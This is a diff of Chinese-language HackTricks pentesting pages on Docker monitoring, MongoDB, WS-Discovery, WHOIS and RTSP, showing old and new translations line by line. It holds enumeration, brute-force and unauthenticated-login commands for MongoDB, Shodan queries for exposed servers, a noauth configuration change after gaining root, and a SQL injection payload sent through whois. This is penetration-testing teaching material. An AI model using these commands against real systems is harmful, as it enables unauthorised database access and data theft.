* 您可以使用工具 [https://github.com/replicatedhq/dockerfilelint](https://github.com/replicatedhq/dockerfilelint) **检查您的 Dockerfile** 找各种错误配置。
* `dockerfilelint Dockerfile`
![](<../.gitbook/assets/image (212).png>)
* 您可以使用工具[https://github.com/RedCoolBeans/dockerlint](https://github.com/RedCoolBeans/dockerlint)来**检查您的Dockerfile**并找各种配置错误
* 您可以使用工具 [https://github.com/RedCoolBeans/dockerlint](https://github.com/RedCoolBeans/dockerlint) **检查您的 Dockerfile** 找各种错误配置。
* `dockerlint Dockerfile`
![](<../.gitbook/assets/image (71).png>)
* 您可以使用工具[https://github.com/hadolint/hadolint](https://github.com/hadolint/hadolint)来**检查您的Dockerfile**并找各种配置错误
* 您可以使用工具 [https://github.com/hadolint/hadolint](https://github.com/hadolint/hadolint) **检查您的 Dockerfile** 找各种错误配置。
* `hadolint Dockerfile`
![](<../.gitbook/assets/image (501).png>)
#### 记录可疑活动
#### Logging Suspicious activity
* 您可以使用工具[https://github.com/falcosecurity/falco](https://github.com/falcosecurity/falco)来检测**运行容器中的可疑行为**。
* 请注意下面的代码块中**Falco如何编译内核模块并插入**。之后,它加载规则并**开始记录可疑活动**。在这种情况下它检测到启动了2个特权容器其中一个带有敏感挂载点几秒钟后检测到一个容器内打开了一个shell。
* 您可以使用工具 [https://github.com/falcosecurity/falco](https://github.com/falcosecurity/falco) 来检测 **正在运行容器中的可疑行为**
* 请注意以下部分中 **Falco 编译内核模块并插入它**。之后,它加载规则并 **开始记录可疑活动**。在这种情况下,它检测到启动了 2 个特权容器,其中 1 个具有敏感挂载,并且在几秒钟后检测到在其中一个容器内打开了一个 shell。
```bash
docker run -it --privileged -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro falco
* Setting up /usr/src links from host
@ -331,9 +333,9 @@ falco-probe found and loaded in dkms
```
#### 监控 Docker
您可以使用 auditd 来监控 Docker。
您可以使用 auditd 来监控 docker。
### 参考
### 参考文献
* [https://ti8m.com/blog/Why-Podman-is-worth-a-look-.html](https://ti8m.com/blog/Why-Podman-is-worth-a-look-.html)
* [https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc](https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc)
@ -342,24 +344,25 @@ falco-probe found and loaded in dkms
<figure><img src="../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由 **暗网** 提供动力的搜索引擎,提供免费功能,用于检查公司或其客户是否受到 **窃取恶意软件****侵害**。
[**WhiteIntel**](https://whiteintel.io) 是一个由 **暗网** 驱动的搜索引擎,提供 **免费** 功能以检查公司或其客户是否被 **窃取恶意软件** **入侵**。
WhiteIntel 的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel 的主要目标是打击由于信息窃取恶意软件导致的账户接管和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
{% embed url="https://whiteintel.io" %}
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想在 HackTricks 中看到您的 **公司广告****下载 PDF 版本的 HackTricks**,请查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索 [**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家 [**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

90
network-services-pentesting/27017-27018-mongodb.md
View file

@ -1,37 +1,38 @@
# 27017,27018 - MongoDB 渗透测试
# 27017,27018 - Pentesting MongoDB
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的公司在 HackTricks 中被广告,或者**下载 HackTricks 的 PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和赏金猎人交流!
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流!
**黑客见解**\
参与深入探讨黑客的刺激挑战的内容
参与深入探讨黑客的刺激挑战的内容
**实时黑客新闻**\
通过实时新闻和见解及时了解快节奏的黑客世界
通过实时新闻和见解,跟上快速变化的黑客世界
**最新公告**\
随时了解最新的赏金计划发布和重要平台更新
了解最新的漏洞赏金计划和重要平台更新
**加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy)立即开始与顶尖黑客合作!
**今天就加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶尖黑客开始合作
## 基本信息
**MongoDB** 是一种使用**面向文档的数据库模型**处理各种形式数据的**开源**数据库管理系统。它提供了灵活性和可扩展性,用于管理应用程序中的非结构化或半结构化数据,如大数据分析和内容管理。**默认端口:**27017, 27018
**MongoDB** 是一**开源** 数据库管理系统,使用 **文档导向数据库模型** 来处理多种形式的数据。它为管理非结构化或半结构化数据提供了灵活性和可扩展性,适用于大数据分析和内容管理等应用。**默认端口:** 27017, 27018
```
PORT STATE SERVICE VERSION
27017/tcp open mongodb MongoDB 2.6.9 2.6.9
@ -52,7 +53,7 @@ print(db)
print(client[db["name"]].list_collection_names())
#If admin access, you could dump the database also
```
**一些 MongoDB 命令:**
**一些MongoDB命令**
```bash
show dbs
use <db>
@ -61,20 +62,20 @@ db.<collection>.find() #Dump the collection
db.<collection>.count() #Number of records of the collection
db.current.find({"username":"admin"}) #Find in current db the username admin
```
### 自动
### 自动
```bash
nmap -sV --script "mongo* and default" -p 27017 <IP> #By default all the nmap mongo enumerate scripts are used
```
### Shodan
* 所有mongodb`"mongodb服务器信息"`
* 搜索完全开放的mongodb服务器`"mongodb服务器信息" -"部分启用"`
* 仅部分启用认证`"mongodb服务器信息" "部分启用"`
* 所有 mongodb: `"mongodb server information"`
* 搜索完全开放的 mongodb 服务器: `"mongodb server information" -"partially enabled"`
* 仅部分启用认证: `"mongodb server information" "partially enabled"`
## 登录
默认情况下,Mongo 不需要密码。\
**Admin** 是一个常见的 Mongo 数据库。
默认情况下,mongo 不需要密码。\
**Admin** 是一个常见的 mongo 数据库。
```bash
mongo <HOST>
mongo <HOST>:<PORT>
@ -87,47 +88,62 @@ nmap -n -sV --script mongodb-brute -p 27017 <ip>
```
### [**暴力破解**](../generic-methodologies-and-resources/brute-force.md#mongo)
查看 _/opt/bitnami/mongodb/mongodb.conf_ 文件以了解是否需要凭据:
查看 _/opt/bitnami/mongodb/mongodb.conf_ 以了解是否需要凭据:
```bash
grep "noauth.*true" /opt/bitnami/mongodb/mongodb.conf | grep -v "^#" #Not needed
grep "auth.*true" /opt/bitnami/mongodb/mongodb.conf | grep -v "^#\|noauth" #Not needed
```
## Mongo Objectid 预测
示例[在这里](https://techkranti.com/idor-through-mongodb-object-ids-prediction/)。
示例 [来自这里](https://techkranti.com/idor-through-mongodb-object-ids-prediction/)。
Mongo Object IDs 是**12字节的十六进制**字符串:
Mongo 对象 ID 是 **12 字节十六进制** 字符串:
![http://techidiocy.com/\_id-objectid-in-mongodb/](../.gitbook/assets/id-and-ObjectIds-in-MongoDB.png)
例如,这里是如何解析应用程序返回的实际 Object ID5f2459ac9fa6dc2500314019
例如,以下是我们如何解析应用程序返回的实际对象 ID5f2459ac9fa6dc2500314019
1. 5f2459ac: 1596217772 转换为十进制 = 2020年7月31日星期五 17:49:32
1. 5f2459ac: 1596217772(十进制)= 2020年7月31日星期五 17:49:32
2. 9fa6dc: 机器标识符
3. 2500: 进程 ID
4. 314019: 增计数器
4. 314019: 增计数器
在上述元素中,机器标识符将在数据库运行在相同的物理/虚拟机器上时保持不变。如果 MongoDB 进程重新启动,进程 ID 将会改变。时间戳将每秒更新一次。通过简单递增计数器和时间戳值来猜测 Object ID 的唯一挑战在于 Mongo DB 生成 Object IDs 并在系统级别分配 Object IDs
在上述元素中,机器标识符在数据库运行在同一物理/虚拟机上时将保持不变。进程 ID 仅在 MongoDB 进程重启时更改。时间戳每秒更新一次。通过简单地递增计数器和时间戳值来猜测对象 ID 的唯一挑战是 Mongo DB 在系统级别生成和分配对象 ID
工具[https://github.com/andresriancho/mongo-objectid-predict](https://github.com/andresriancho/mongo-objectid-predict),给定一个起始 Object ID您可以创建一个帐户并获取一个起始 ID它会返回大约 1000 个可能被分配给下一个对象的 Object IDs因此您只需要对它们进行暴力破解。
工具 [https://github.com/andresriancho/mongo-objectid-predict](https://github.com/andresriancho/mongo-objectid-predict),给定一个起始对象 ID您可以创建一个帐户并获取起始 ID它会返回大约 1000 个可能分配给下一个对象的对象 ID因此您只需对它们进行暴力破解。
## 帖子
## Post
如果您是 root 用户,您可以**修改** **mongodb.conf** 文件以便不需要凭据_noauth = true_**无凭证登录**
如果您是 root您可以 **修改** **mongodb.conf** 文件以便不需要凭据_noauth = true_**无需凭据登录**
***
<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
加入[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和赏金猎人交流!
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流!
**黑客见解**\
参与深入探讨黑客行为的内容
参与深入探讨黑客的刺激和挑战的内容
**实时黑客新闻**\
通过实时新闻和见解及时了解快节奏的黑客世界
通过实时新闻和见解,跟上快速变化的黑客世界
**最新公告**\
通过最新的赏金计划发布和重要平台更新保持信息更新
了解最新的漏洞赏金启动和重要平台更新
**加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy) 并开始与顶尖黑客合作!
**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),今天就开始与顶级黑客合作!
{% hint style="success" %}
学习和实践 AWS 黑客攻击:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客攻击:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>支持 HackTricks</summary>
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

42
network-services-pentesting/3702-udp-pentesting-ws-discovery.md
View file

@ -1,28 +1,29 @@
# 3702/UDP - 渗透测试 WS-Discovery
# 3702/UDP - Pentesting WS-Discovery
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>Support HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFT**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## 基本信息
**Web 服务动态发现协议WS-Discovery** 被定义为一种旨在通过多播在本地网络中发现服务的协议。它促进了**目标服务**和**客户端**之间的交互。目标服务是可供发现的端点,而客户端是积极寻找这些服务的端点。通信是通过**UDP 上的 SOAP 查询**建立的,定向到多播地址 **239.255.255.250** 和 UDP 端口 **3702**
**Web Services Dynamic Discovery Protocol (WS-Discovery)** 被识别为一种协议,旨在通过多播在本地网络中发现服务。它促进了**目标服务**与**客户端**之间的交互。目标服务是可供发现的端点,而客户端则是主动搜索这些服务的实体。通信是通过**SOAP 查询通过 UDP** 建立的,目标是多播地址 **239.255.255.250** 和 UDP 端口 **3702**
加入网络后,目标服务通过广播**多播 Hello** 来宣布自己的存在。它保持开放以接收来自正在寻找按类型服务的客户端的**多播探测**。类型是端点的唯一标识符(例如,对于 IP 摄像头,可以是 **NetworkVideoTransmitter**)。作为对匹配探测的响应,目标服务可能会发送**单播探测匹配**。同样,目标服务可能会收到旨在通过名称识别服务的**多播解析**,如果它是预期目标,则可能会回复**单播解析匹配**。在离开网络时,目标服务会尝试广播**多播 Bye**,表示它的离开。
当加入网络时,目标服务通过广播**多播 Hello** 来宣布其存在。它保持开放状态,以接收来自寻找按类型服务的客户端的**多播探测**,该类型是端点的唯一标识符(例如,**NetworkVideoTransmitter** 用于 IP 摄像头)。作为对匹配探测的响应,目标服务可以发送**单播探测匹配**。类似地,目标服务可以接收旨在通过名称识别服务的**多播解析**,如果它是目标服务,则可以回复**单播解析匹配**。在离开网络时,目标服务尝试广播**多播再见**,以表示其离开。
![](<../.gitbook/assets/image (689).png>)
**默认端口**3702
**默认端口**: 3702
```
PORT STATE SERVICE
3702/udp open|filtered unknown
@ -32,16 +33,17 @@ PORT STATE SERVICE
| Address: http://10.0.200.116:50000
|_ Type: Device wprt:PrintDeviceType
```
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索我们的独家[**NFTs**]收藏品,[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

48
network-services-pentesting/43-pentesting-whois.md
View file

@ -1,18 +1,19 @@
# 43 - 渗透测试 WHOIS
# 43 - Pentesting WHOIS
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>Support HackTricks</summary>
支持 HackTricks 的其他方式:
- 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
- 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
- **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注**我们。
- 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
**Try Hard Security Group**
@ -24,25 +25,25 @@
## 基本信息
**WHOIS** 协议作为一种标准方法,通过特定数据库查询各种互联网资源的**注册者或持有者**。这些资源包括域名、IP 地址块和自治系统等。除此之外,该协议还应用于访问更广泛的信息。
**WHOIS** 协议作为一种标准方法,用于 **查询各种互联网资源的注册人或持有者**通过特定的数据库。这些资源包括域名、IP地址块和自治系统等。除此之外该协议还可用于访问更广泛的信息。
**默认端口:** 43
```
PORT STATE SERVICE
43/tcp open whois?
```
## 枚举
## Enumerate
获取 whois 服务对域名的所有信息:
获取whois服务关于域名的所有信息:
```bash
whois -h <HOST> -p <PORT> "domain.tld"
echo "domain.ltd" | nc -vn <HOST> <PORT>
```
注意有时在向WHOIS服务请求某些信息时响应中会出现正在使用的数据库
注意有时在向WHOIS服务请求某些信息时所使用的数据库会出现在响应中
![](<../.gitbook/assets/image (301).png>)
此外WHOIS服务始终需要使用**数据库**来存储和提取信息。因此,当从用户提供的信息**查询**数据库时,可能会出现**SQL注入**。例如执行:`whois -h 10.10.10.155 -p 43 "a') or 1=1#"` 您可能能够**提取**数据库中保存的所有**信息**。
此外WHOIS服务始终需要使用一个**数据库**来存储和提取信息。因此,在**查询**用户提供的某些信息时,可能会存在**SQLInjection**。例如,执行:`whois -h 10.10.10.155 -p 43 "a') or 1=1#"`,您可能能够**提取所有**存储在数据库中的**信息**。
## Shodan
@ -54,7 +55,7 @@ echo "domain.ltd" | nc -vn <HOST> <PORT>
{% embed url="https://discord.gg/tryhardsecurity" %}
## HackTricks Automatic Commands
## HackTricks 自动命令
```
Protocol_Name: WHOIS #Protocol Abbreviation if there is one.
Port_Number: 43 #Comma separated if there is more than one.
@ -74,16 +75,17 @@ Name: Banner Grab
Description: Grab WHOIS Banner
Command: whois -h {IP} -p 43 {Domain_Name} && echo {Domain_Name} | nc -vn {IP} 43
```
{% hint style="success" %}
学习与实践 AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
其他支持HackTricks的方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

76
network-services-pentesting/554-8554-pentesting-rtsp.md
View file

@ -1,49 +1,50 @@
# 554,8554 - 渗透测试 RTSP
# 554,8554 - Pentesting RTSP
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
## 基本信息
来自 [维基百科](https://en.wikipedia.org/wiki/Real\_Time\_Streaming\_Protocol)
来自 [wikipedia](https://en.wikipedia.org/wiki/Real\_Time\_Streaming\_Protocol):
> **实时流媒体传输协议****RTSP**)是一种网络控制协议,旨在用于娱乐和通信系统中控制流媒体服务器。该协议用于在端点之间建立和控制媒体会话。媒体服务器的客户端发出类似 VHS 风格的命令,如播放、录制和暂停,以便实时控制从服务器流式传输到客户端(视频点播)或从客户端到服务器(语音录制)的媒体流。
> **实时流协议** (**RTSP**) 是一种网络控制协议,旨在用于娱乐和通信系统,以控制流媒体服务器。该协议用于在端点之间建立和控制媒体会话。媒体服务器的客户端发出类似 VHS 的命令,如播放、录制和暂停,以便实时控制从服务器到客户端(点播视频)或从客户端到服务器(语音录音)的媒体流。
>
> 流媒体数据的传输本身不是 RTSP 的任务。大多数 RTSP 服务器与实时传输协议RTP结合使用实时控制协议RTCP进行媒体流传递。但是一些供应商实现了专有的传输协议。例如RealNetworks 的 RTSP 服务器软件还使用了 RealNetworks 的专有实时数据传输RDT
